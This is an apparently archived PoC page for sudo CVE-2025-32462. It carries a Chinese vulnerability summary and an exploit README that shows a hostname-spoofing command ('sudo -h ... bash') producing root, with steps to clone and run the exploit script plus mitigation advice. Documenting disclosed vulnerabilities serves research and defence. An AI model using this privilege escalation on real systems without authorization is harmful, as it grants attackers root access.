POC详情: 607ac7fc0967d16f2cf9edbafb76417898fd37c4

来源
关联漏洞
标题: Sudo 安全漏洞 (CVE-2025-32462)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于允许列出的用户在非预期机器上执行命令。
描述
CVE-2025-32462 Exploit
介绍
# CVE-2025-32462-Exploit: Matrix-Sudo Escape  
**Hostname Spoofing Privilege Escalation (CVE-2025-32462)**  

*"You take the blue pill... the story ends. You take the red pill... you get root."*  

## Description  
This exploit demonstrates a privilege escalation vulnerability in sudo (`CVE-2025-32462`) where hostname-based restrictions can be bypassed using the `-h` flag. The PoC creates a restricted user environment, then escapes it by spoofing a whitelisted hostname to gain root access.

```bash
[user@matrix-node]$ sudo -h zion-core bash  # Spoof whitelisted hostname
[root@matrix-node]# id                          # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)
```
## Technical Details
- Vulnerable Sudo Versions: < 1.9.17
- Attack Vector: Local privilege escalation
- Key Flaw: Hostname verification bypass via sudo -h parameter
- Impact: Restricted users can gain root on improperly configured systems

## Usage
**Clone repository:**
```bash
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
```

**Make executable and run:**
```bash
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
```

**Follow interactive prompts to demonstrate:**
- CVE-2025-32462 vulnerability detection
- User creation
- Hostname restriction setup
- Exploit execution
- Cleanup

## Protection
- ✅ Update sudo to v1.9.17+
- ✅ Avoid hostname-based sudo restrictions
- ✅ Use group-based sudo policies instead

## Legal
For educational/research purposes only. Use only on systems you own or have permission to test.
文件快照

[4.0K] /data/pocs/607ac7fc0967d16f2cf9edbafb76417898fd37c4 ├── [5.3K] matrix-sudo-escape.sh └── [1.5K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。